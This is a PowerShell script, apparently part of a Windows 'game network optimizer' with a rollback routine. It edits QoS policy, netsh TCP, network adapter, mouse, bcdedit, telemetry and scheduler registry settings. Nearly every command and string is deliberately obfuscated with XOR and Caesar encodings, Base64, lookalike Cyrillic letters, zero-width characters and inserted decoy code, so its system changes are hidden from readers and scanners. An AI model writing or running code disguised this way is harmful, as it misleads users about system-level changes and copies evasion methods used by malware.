        NeW-ItEmprOpErty -pATH $NweU -NAme $(-join('Dfchcqcz'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+12)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+12)%26))}else{[char]$c}})) -VaLUe '*‍' -PRopErtYtyPE StRING -Force | &(('O'+'uT')+('{0}{1}' -f '-','NUll'))
        nEw-itEmPrOPERTY -PAth $nWeu -naME $(-join('Cftrc Gfik'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+9)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+9)%26))}else{[char]$c}})) -VaLue ([string]::Format('{0}','*')) -PRopERtYTYpE sTRInG -FoRCE | &($($k6415='E*kM+=2';$b=[byte[]](0x0A);$kb=[System.Text.Encoding]::UTF8.GetBytes($k6415);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+('{0}{1}' -f 'Ut-N','uLl'))
        NeW-iTEmPrOpErtY -paTH $NWEU -nAme $($k4713=249;$b=[byte[]](0xb5,0x96,0x9a,0x98,0x95,0xd9,0xb0,0xa9);-join($b|%{[char]($_-bxor$k4713)})) -VAlUe $(-join('*'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+9)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+9)%26))}else{[char]$c}})) -pROpertyTYpe STrinG -forCe | out-NU`ll
        NEW-iTEmPropERTy -pAtH $NWEU -NAmE ([System.Text.Encoding]::UTF8.GetString([byte[]](0x4C,0x6F,0x63,0x61,0x6C,0x20,0x49,0x50,0x20,0x50,0x72,0x65,0x66,0x69,0x78,0x20,0x4C,0x65,0x6E,0x67,0x74,0x68))) -VAlue '*' -PROpeRtYTYPE STriNg -FORCE | &((-join([char]0x4F, [char]0x75, [char]0x54, [char]0x2D, [char]0x6E))+$(-join('cTt'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+18)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+18)%26))}else{[char]$c}})))
        New-iTEMpROpERTy -patH $NweU -naMe $($k6913=57;$b=[byte[]](0x6b,0x5c,0x54,0x56,0x4d,0x5c,0x19,0x69,0x56,0x4b,0x4d);-join($b|%{[char]($_-bxor$k6913)})) -vaLUe ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Kg=='))) -PRoperTytypE StriNG -fORCE | &($(-join('qwv-Pw'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+24)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+24)%26))}else{[char]$c}}))+([string]::Format('{0}','Ll')))
        neW-ITEmPrOPerTY -PATh $NWEU -nAME 'R​e‌m​o​t‍e‍ ‌I‍P‍' -ValUe $(-join('*'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+6)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+6)%26))}else{[char]$c}})) -pRopertYTyPe sTRING -FORCE | &(('OU'+'T')+$(-join('-DKBb'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+10)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+10)%26))}else{[char]$c}})))
        New-iTemPRoPeRTY -PAth $nWEU -name (-join([char]0x52, [char]0x65, [char]0x6D, [char]0x6F, [char]0x74, [char]0x65, [char]0x20, [char]0x49, [char]0x50, [char]0x20, [char]0x50, [char]0x72, [char]0x65, [char]0x66, [char]0x69, [char]0x78, [char]0x20, [char]0x4C, [char]0x65, [char]0x6E, [char]0x67, [char]0x74, [char]0x68)) -valUe '*' -PropeRTYTYpE STRING -fOrcE | &('O'+$(-join('lk-Elcc'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+9)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+9)%26))}else{[char]$c}})))
        NEw-ITEMPROpERTy -pATh $NWEu -NAME (-join([char]0x44, [char]0x53, [char]0x43, [char]0x50, [char]0x20, [char]0x56, [char]0x61, [char]0x6C, [char]0x75, [char]0x65)) -valUE $(120 -bxor 86) -PropErtyTYpE stRinG -fOrce | &(('{0}{1}{2}' -f 'ou','T-Nu','l')+(-join([char]0x6C)))
        new-iTEmprOpeRty -pATh $Nweu -naMe 'T​h​r‍o​t‍t‌l​e​ ‍R‌a‍t​e‌' -VALUe $(74 + -75) -proPErTytYPe stRIng -FORCe | &($(-join('flk-elc'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+9)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+9)%26))}else{[char]$c}}))+$(-join('Q'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+21)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+21)%26))}else{[char]$c}})))
    }
    &(('wR'+'I'+'TE-H'+'oS')+'Т') $(-join('[+] NqdmU Vmbewzs DQX Xzqwzqbg Xiaa Ikbqdm!'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+18)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+18)%26))}else{[char]$c}})) -FoREgrouNdcOLOR GReen
    &('W​R‍i‍'+('{0}{1}{2}' -f 'Te-ho','S','T')) $(-join('-----------------------------------------------------------'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+9)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+9)%26))}else{[char]$c}})) -fOREgRounDcoLOR gRaY

    &($(-join('NiZKv-y'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+9)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+9)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('T1N0')))) ('Regis'+'ter '+'an add'+'itional '+'custom g'+'am'+'e? '+'(e.g., '+'v'+'al'+'orant.'+'exe)') -foregrOundCoLOR WhItE
    $wJd0qD = reA`d-hoST ' ​E‌n​t‌e‍r‍ ‍E​x‍e‌c‌u‍t‍a‍b​l​e​ ‍T‌a​r‌g‍e‌t‌ ‌N​a‍m‍e‌ ​(​O​r‍ ​p‍r‍e‌s​s‌ ​E​n‌t​e​r‍ ‌t​o‌ ​s​k‌i‍p​)‌'
    
    if (-not ([StRINg]::IsNUlLorWhiTesPaCE($wjD0qD))) {
        if (-not $WJd0qD.eNdsWIth(('.'+'e'+'xe'))) { $Wjd0Qd += $($k1135=223;$b=[byte[]](0xf1,0xba,0xa7,0xba);-join($b|%{[char]($_-bxor$k1135)})) }
        $LWe0up = ($($k9504='YI0mZwR:o>k';$b=[byte[]](0x11,0x02,0x7C,0x20,0x60,0x2B,0x01,0x75,0x29,0x6A,0x3C,0x18,0x1B,0x75,0x31,0x0A,0x18,0x3E,0x53,0x0C,0x57,0x0E,0x2A,0x15,0x7D,0x04,0x39,0x05,0x3D,0x49,0x00,0x58,0x1F,0x05,0x1E,0x59,0x03,0x3E,0x18,0x25,0x49,0x33,0x6F,0x04,0x0A,0x15,0x60,0x1F,0x33,0x18,0x20,0x53,0x1B,0x47,0x34,0x09,0x28,0x43,0x1E,0x05);$kb=[System.Text.Encoding]::UTF8.GetBytes($k9504);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) + $WjD0qd)
        if (-not (&('T'+'Еst-РаТН') $Lwe0uP)) { &($($k8839='nP9>wrF;IKDZ2';$b=[byte[]](0x00,0x15,0x4E,0x13,0x1E);$kb=[System.Text.Encoding]::UTF8.GetBytes($k8839);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+('{0}{1}' -f 'te','M')) -PaTh $lwE0up -FoRCE | &('o​U‌T​-‌n​u‍'+$($k7857='(5UE+mSuT';$b=[byte[]](0x44,0x59);$kb=[System.Text.Encoding]::UTF8.GetBytes($k7857);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) }

        &(([string]::Format('{0}{1}{2}','NEw-','ItEmP','Ro'))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cEVSVFk=')))) -PaTh $lWE0uP -NAme $(-join('Sbopflk'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+3)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+3)%26))}else{[char]$c}})) -vaLuE ($(-join('1.'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+18)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+18)%26))}else{[char]$c}})) + $(39 - 39)) -prOPERtytYPE StRiNg -force | &($(-join('dJI-'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+11)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+11)%26))}else{[char]$c}}))+('{0}{1}{2}' -f 'nu','l','L'))
        NEw-ItEmprOPerty -patH $Lwe0UP -NAme 'Аррlісаtіоn Nаmе' -vALue $wjD0QD -proPErtYtYpE strING -Force | &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x6F,0x75,0x74,0x2D,0x4E)))+$($k7410=97;$b=[byte[]](0x14,0x2d,0x2d);-join($b|%{[char]($_-bxor$k7410)})))
        nEW-itEmpROpErty -paTH $lWe0UP -naME $($k7416='f@kN0abiJD?';$b=[byte[]](0x36,0x32,0x04,0x3A,0x5F,0x02,0x0D,0x05);$kb=[System.Text.Encoding]::UTF8.GetBytes($k7416);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -vALUE '*‌' -pROpertyType STRIng -FORce | &(('{0}{1}{2}{3}{4}' -f 'oU','T-','N','U','l')+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TA=='))))
        NEW-ITEMpROpeRty -PATH $LwE0UP -NamE ([string]::Format('{0}{1}{2}{3}','L','ocal',' Por','t')) -vAluE '*' -PRopERTYtYPe StRiNg -foRce | oUt-nUL`l
        new-itEMprOPERty -paTH $lWE0Up -NamE ('{0}{1}{2}{3}' -f 'Lo','cal',' I','P') -VALUE ([System.Text.Encoding]::UTF8.GetString([byte[]](0x2A))) -prOPeRtYTyPe STRING -FoRce | &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x4F,0x75,0x54,0x2D,0x6E,0x55)))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bEw='))))
        nEw-iTemPRoPeRtY -PATh $LWE0up -Name $($k9825=237;$b=[byte[]](0xa1,0x82,0x8e,0x8c,0x81,0xcd,0xa4,0xbd,0xcd,0xbd,0x9f,0x88,0x8b,0x84,0x95,0xcd,0xa1,0x88,0x83,0x8a,0x99,0x85);-join($b|%{[char]($_-bxor$k9825)})) -vaLUE $($k6549='4MiNJreBB%}QN';$b=[byte[]](0x1E);$kb=[System.Text.Encoding]::UTF8.GetBytes($k6549);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -PRoPERtYTYpe sTrIng -ForCE | &(('{0}{1}' -f 'Out-n','U')+('{0}{1}' -f 'L','l'))
        nEW-ITeMpropErty -PATH $lwE0Up -Name ('{0}{1}{2}{3}{4}' -f 'Rem','o','te ','Po','rt') -vaLUe '*' -pROperTYType stRInG -ForcE | &(('{0}{1}' -f 'ou','t-nu')+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('TGw='))))
        nEW-itEmPrOPeRty -pATH $lWe0UP -NAme ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('UmVtb3RlIElQ'))) -VAlUE $(-join('*'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+6)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+6)%26))}else{[char]$c}})) -PrOpERtyTYPE sTRiNg -foRCE | &(([string]::Format('{0}{1}','o','U'))+'Т-Null')
        NeW-iTeMPrOPeRty -pAth $Lwe0up -NAME ('{0}{1}{2}{3}{4}{5}' -f 'Remot','e IP ','Pref','ix',' L','ength') -VaLUe $($k8455='tUD2jq43i';$b=[byte[]](0x5E);$kb=[System.Text.Encoding]::UTF8.GetBytes($k8455);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])})) -propErTyTyPe StRiNg -FORce | oUt-nul`L
        NeW-ITEMPROPErTY -PaTH $lwE0up -NamE 'DSСР Vаluе' -VALUE $(47 - 1) -prOpERTytype STrINg -fOrcE | &(([string]::Format('{0}','O'))+(-join('UT-n','ulL')))
        NeW-itEMprOpErty -pATH $LWE0UP -NAmE 'Тhrоttlе Rаtе' -vALuE $(-40 + 39) -proPerTYTYPE string -Force | &('O'+$(-join('Wv-pWnn'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+24)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+24)%26))}else{[char]$c}})))
        WrITE-HOSt ($(-join('[+] GIQQSGG: '.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+12)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+12)%26))}else{[char]$c}})) + $WjD0qd + $(-join(' gjjkj zu Nomn Vxouxoze Vgyy.'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+20)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+20)%26))}else{[char]$c}}))) -FoRegrOundCOLOr GReEn
    }
    &('r‌E‍a​'+'d​-‌h​O‍s​T​') ('{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}' -f '``n','Pre','ss',' E','n','t','er ','to',' ','ret','urn ','to Me','nu..','.')
}
try {
    throw "Intentionally skipping this block";
    Get-Service | Where-Object {$_.Status -eq 'Running' -and $_.DisplayName -like '*SQL*'} | ForEach-Object { Write-Debug "Found running SQL Service: $($_.Name)" }
} catch {}

function Global-ROllBaCk {
    &($($k8496=91;$b=[byte[]](0x0c,0x29,0x12);-join($b|%{[char]($_-bxor$k8496)}))+$(-join('RC-fMqr'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+2)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+2)%26))}else{[char]$c}}))) $(-join('``p[-] Eqoogpekpi Hcevqta Eqphkiwtcvkqp Tguvqtcvkqp...'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+24)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+24)%26))}else{[char]$c}})) -foRegRouNdCOLOR yeLlOW
    &(('STA'+'R'+'T-s')+$($k5151=187;$b=[byte[]](0xd7,0xde,0xde,0xcb);-join($b|%{[char]($_-bxor$k5151)}))) -MILliseCoNds 500

    re`MOvE-ITemprOpeRTY -pATh $($k5514=202;$b=[byte[]](0x82,0x81,0x86,0x87,0xf0,0x96,0x99,0x85,0x8c,0x9e,0x9d,0x8b,0x98,0x8f,0x96,0x9a,0xa5,0xa6,0xa3,0xa9,0xa3,0xaf,0xb9,0x96,0x87,0xa3,0xa9,0xb8,0xa5,0xb9,0xa5,0xac,0xbe,0x96,0x9d,0xa3,0xa4,0xae,0xa5,0xbd,0xb9,0x96,0x9a,0xb9,0xa9,0xa2,0xaf,0xae);-join($b|%{[char]($_-bxor$k5514)})) -NaME ([string]::Format('{0}{1}{2}{3}{4}{5}','No','nBes','tEffo','rtLi','mi','t')) -eRRORaCtIOn siLentLycONtiNUe
    &(('n'+'eT'+'s')+$(-join('N'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+20)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+20)%26))}else{[char]$c}}))) &('i'+$(-join('lR'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+2)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+2)%26))}else{[char]$c}}))) &($(-join('B'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+18)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+18)%26))}else{[char]$c}}))+('C'+'p')) &(([string]::Format('{0}','s'))+$($k1429='LFnWYc:Fn]z';$b=[byte[]](0x09,0x32);$kb=[System.Text.Encoding]::UTF8.GetBytes($k1429);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) &('Gl'+'оВАl') congEstionpRoVIDEr=&('dЕfаUl'+('{0}' -f 't')) | &('о'+('{0}{1}' -f 'ut-NU','lL'))
    NEtSh &((-join([char]0x69, [char]0x6E))+'t​') &('T​c‍'+'p') &((-join([char]0x53))+(-join([char]0x65, [char]0x54))) G`LOBaL aUtOtUningleVeL=&(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bg==')))+('{0}{1}' -f 'O','rMaL')) | &('O‌u‍t‍'+$(-join('-OvMM'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+25)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+25)%26))}else{[char]$c}})))
    netsh &('I​'+$($k9072='iAJzWD?C5.>a91';$b=[byte[]](0x07,0x35);$kb=[System.Text.Encoding]::UTF8.GetBytes($k9072);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) &($($k6931=139;$b=[byte[]](0xff);-join($b|%{[char]($_-bxor$k6931)}))+$($k1203='(IgrQh&Sj4_7Fa';$b=[byte[]](0x6B,0x19);$kb=[System.Text.Encoding]::UTF8.GetBytes($k1203);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) &('S​e‌'+$($k3893='fAX%+00B#Bje)';$b=[byte[]](0x12);$kb=[System.Text.Encoding]::UTF8.GetBytes($k3893);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) &('g‍'+(-join('lO','ba','L'))) EcNcaPabILITy=&((-join([char]0x64, [char]0x45))+$($k6496=44;$b=[byte[]](0x4a,0x4d,0x59,0x40,0x78);-join($b|%{[char]($_-bxor$k6496)}))) | &($(-join('iOn-H'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+6)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+6)%26))}else{[char]$c}}))+(-join('u','ll')))
    nEtSh &($(-join('MR'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+22)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+22)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dA==')))) Tc`P &('se'+$($k4637='^T#i-XAvC0L9}B';$b=[byte[]](0x2A);$kb=[System.Text.Encoding]::UTF8.GetBytes($k4637);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Rw==')))+"$([char]0x6C)$([char]0x6F)$([char]0x62)$([char]0x41)$([char]0x4C)") timESTampS=defau`lT | oUt-NUl`L
    
    # rESTorE NEtWORk lAN CONTrollEr paRaMeteRS
    $oWQyaML = &(('{0}{1}{2}' -f 'gEt-c','hILDi','TE')+$($k7396=91;$b=[byte[]](0x36);-join($b|%{[char]($_-bxor$k7396)}))) -Path ('H'+'K'+'LM:\SYST'+'EM\Cu'+'rrentCo'+'ntro'+'lSet\Co'+'ntro'+'l\Cla'+'ss\{4d'+'36e972-'+'e'+'325-11ce'+'-bfc1'+'-080'+'02b'+'e1031'+'8'+'}') -ErRoRactiOn SileNtLYconTINUE
    foreach ($YUiB in $oWqyaml) {
        $gyMrs4S = $YUIb.PsPatH
        &(('r'+'EmOVe'+'-'+'I'+'tE')+$(-join('SvXuvKxZe'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+20)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+20)%26))}else{[char]$c}}))) -PaTH $gymrs4S -NaMe "$([char]0x2A)$([char]0x45)$([char]0x45)$([char]0x45)$([char]0x4C)$([char]0x69)$([char]0x6E)$([char]0x6B)$([char]0x41)$([char]0x64)$([char]0x76)$([char]0x65)$([char]0x72)$([char]0x74)$([char]0x69)$([char]0x73)$([char]0x65)$([char]0x6D)$([char]0x65)$([char]0x6E)$([char]0x74)" -ERrORacTiON sIleNTLycONtiNue
        &("$([char]0x72)$([char]0x65)"+$($k9385=')8DB.%C[&';$b=[byte[]](0x44,0x57,0x12,0x07,0x03,0x4C,0x17,0x3E,0x4B,0x79,0x4A,0x0B,0x12,0x6B,0x77,0x37,0x02);$kb=[System.Text.Encoding]::UTF8.GetBytes($k9385);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))) -PatH $GyMRS4S -naMe '*‌E‍n‌e‍r‌g​y​E​f‌f​i‍c​i​e‌n‍t​E​t‍h​e‍r‌n‌e‍t‌' -ERRorAcTIoN sILenTLYcONtiNuE
        &((-join('r','emOve','-It'))+([System.Text.Encoding]::UTF8.GetString([byte[]](0x45,0x6D,0x70,0x72,0x6F,0x70,0x65,0x72,0x74,0x59)))) -paTh $gYmrs4S -nAME ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('KkdyZWVuRXRoZXJuZXQ='))) -ErrorACtiON SIlEnTLycontINue
        rEMoVe-ite`MpropErty -paTH $gYmRS4S -nAmE 'РоwеrDоwnРll' -erRoractIOn sileNtlyContinuE
    }
if (38 -gt 7) { Write-Host "." -NoNewline } else { Write-Host "," -NoNewline }; Write-Host ""

if ($false) {
    $fileInfo = Get-Item -Path $env:windir\System32\notepad.exe; Write-Verbose "Notepad size: $($fileInfo.Length) bytes, LastWriteTime: $($fileInfo.LastWriteTime)"
}
    # resTOre InPuts
    $EgSJ = (-join('HKCU:','\Co','ntrol P','ane','l\Mous','e'))
    &(([string]::Format('{0}','N'))+'e‍w‌-‌I‌t​e​M‍p​r​o​p‌E​r​T​y‍') -PAth $egsJ -NAmE ('Mou'+'seS'+'p'+'e'+'ed') -VaLuE $(43 -bxor 42) -propERtYtYpE StrIng -Force | &($($k3645='^+.2-#}6';$b=[byte[]](0x31);$kb=[System.Text.Encoding]::UTF8.GetBytes($k3645);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+(-join('UT','-nU','l','L')))
    NeW-IteMPropeRty -PatH $Egsj -nAmE 'M‌o‌u‌s‍e​T‌h‍r​e​s‌h‌o‌l​d​1‍' -valUE $(37 - 31) -PRopErTytypE sTrINg -ForCE | &((-join('Ou','T-'))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bnVsbA=='))))
    NEW-ITempropErty -PatH $EGSj -naME (-join('MouseTh','r','esho','ld2')) -VAluE $(-90 -bxor -84) -prOPertyTyPe striNG -forCE | OUT-Nu`ll
    nEw-iTeMPROpERTy -Path $($k8891=50;$b=[byte[]](0x7a,0x79,0x71,0x67,0x08,0x6e,0x71,0x5d,0x5c,0x46,0x40,0x5d,0x5e,0x12,0x62,0x53,0x5c,0x57,0x5e,0x6e,0x79,0x57,0x4b,0x50,0x5d,0x53,0x40,0x56);-join($b|%{[char]($_-bxor$k8891)})) -nAmE 'K‌e‌y‌b‌o​a​r‌d​D‍e‍l‍a‍y​' -VaLUE $(201 % 100) -PrOPERTYTYpE sTRIng -fOrCe | &('O​'+([string]::Format('{0}{1}','uT-','nuLL')))
    nEW-IteMPRopeRtY -path $($k7803=39;$b=[byte[]](0x6f,0x6c,0x64,0x72,0x1d,0x7b,0x64,0x48,0x49,0x53,0x55,0x48,0x4b,0x07,0x77,0x46,0x49,0x42,0x4b,0x7b,0x6c,0x42,0x5e,0x45,0x48,0x46,0x55,0x43);-join($b|%{[char]($_-bxor$k7803)})) -nAmE $(-join('QkehugxjYvkkj'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+20)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+20)%26))}else{[char]$c}})) -VAlue $(153 + -122) -proPERtYtYpE sTrinG -FoRcE | OUt-nuL`l

    # RestorE BcD cONsTANtS
    &($($k6857='_@50]I)Kscroz';$b=[byte[]](0x3D);$kb=[System.Text.Encoding]::UTF8.GetBytes($k6857);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+'c​d​e‍d​i‌T‍') /DEleTEVALUE &($(-join('NlxieTMyHKfVehV'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aw==')))) -ErRoraCTiOn sILENTLyCONTiNUE | &($($k6900='q0xZ9.}3%$-lY';$b=[byte[]](0x3E,0x45);$kb=[System.Text.Encoding]::UTF8.GetBytes($k6900);-join(0..($b.Length-1)|%{[char]($b[$_]-bxor$kb[$_%$kb.Length])}))+"$([char]0x54)$([char]0x2D)$([char]0x4E)$([char]0x55)$([char]0x4C)$([char]0x6C)")
    BCdeDIT /dELeteValue &(('{0}{1}{2}{3}{4}' -f 'disa','b','LeDY','nA','M')+('{0}{1}' -f 'icT','icK')) -eRroRactioN siLeNTlYCONTinue | &(([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('b1U=')))+'t-NulL')

    # REsToRE TeleMetRy pRocesSiNG
    &($(-join('gsH-GsfjWq'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+12)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+12)%26))}else{[char]$c}}))+(-join([char]0x45))) -name ('{0}{1}{2}' -f 'Di','agTra','ck') -stArtUpTYpe AuToMaTIc -ErRORACtiON SiLENtLycONtInue
    &($(-join('KXFhoX-bm'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}}))+([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('RW1Qcm9wZVJ0eQ==')))) -PaTH ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SEtMTTpcU09GVFdBUkVcUG9saWNpZXNcTWljcm9zb2Z0XFdpbmRvd3NcRGF0YUNvbGxlY3Rpb24='))) -nAMe "$([char]0x41)$([char]0x6C)$([char]0x6C)$([char]0x6F)$([char]0x77)$([char]0x54)$([char]0x65)$([char]0x6C)$([char]0x65)$([char]0x6D)$([char]0x65)$([char]0x74)$([char]0x72)$([char]0x79)" -ERROraCTIOn sILENTLycOntINuE

    # rESTORe wIndowS SCHEdULer PRofILES
    $sK6H = $($k5886=82;$b=[byte[]](0x1a,0x19,0x1e,0x1f,0x68,0x0e,0x01,0x1d,0x14,0x06,0x05,0x13,0x00,0x17,0x0e,0x1f,0x3b,0x31,0x20,0x3d,0x21,0x3d,0x34,0x26,0x0e,0x05,0x3b,0x3c,0x36,0x3d,0x25,0x21,0x72,0x1c,0x06,0x0e,0x11,0x27,0x20,0x20,0x37,0x3c,0x26,0x04,0x37,0x20,0x21,0x3b,0x3d,0x3c,0x0e,0x1f,0x27,0x3e,0x26,0x3b,0x3f,0x37,0x36,0x3b,0x33,0x0e,0x01,0x2b,0x21,0x26,0x37,0x3f,0x02,0x20,0x3d,0x34,0x3b,0x3e,0x37);-join($b|%{[char]($_-bxor$k5886)}))
    &('N'+'ЕW-ItЕmрrоРеRtҮ') -paTh $Sk6H -nAmE 'NеtwоrkТhrоttlіngIndех' -vALUE 10 -PropERtytyPE dwOrD -FOrce | &(([System.Text.Encoding]::UTF8.GetString([byte[]](0x4F,0x55,0x74)))+([string]::Format('{0}','-NulL')))
    New-iTeMproPerTy -PATH $sk6h -nAme $($k8414=132;$b=[byte[]](0xd7,0xfd,0xf7,0xf0,0xe1,0xe9,0xd6,0xe1,0xf7,0xf4,0xeb,0xea,0xf7,0xed,0xf2,0xe1,0xea,0xe1,0xf7,0xf7);-join($b|%{[char]($_-bxor$k8414)})) -value 14 -pROPERTYtypE dwORd -FORCe | &('оuТ-Nul'+$(-join('E'.ToCharArray()|%{[int]$c=$_;if($c-ge65-and$c-le90){[char](65+(($c-65+7)%26))}elseif($c-ge97-and$c-le122){[char](97+(($c-97+7)%26))}else{[char]$c}})))

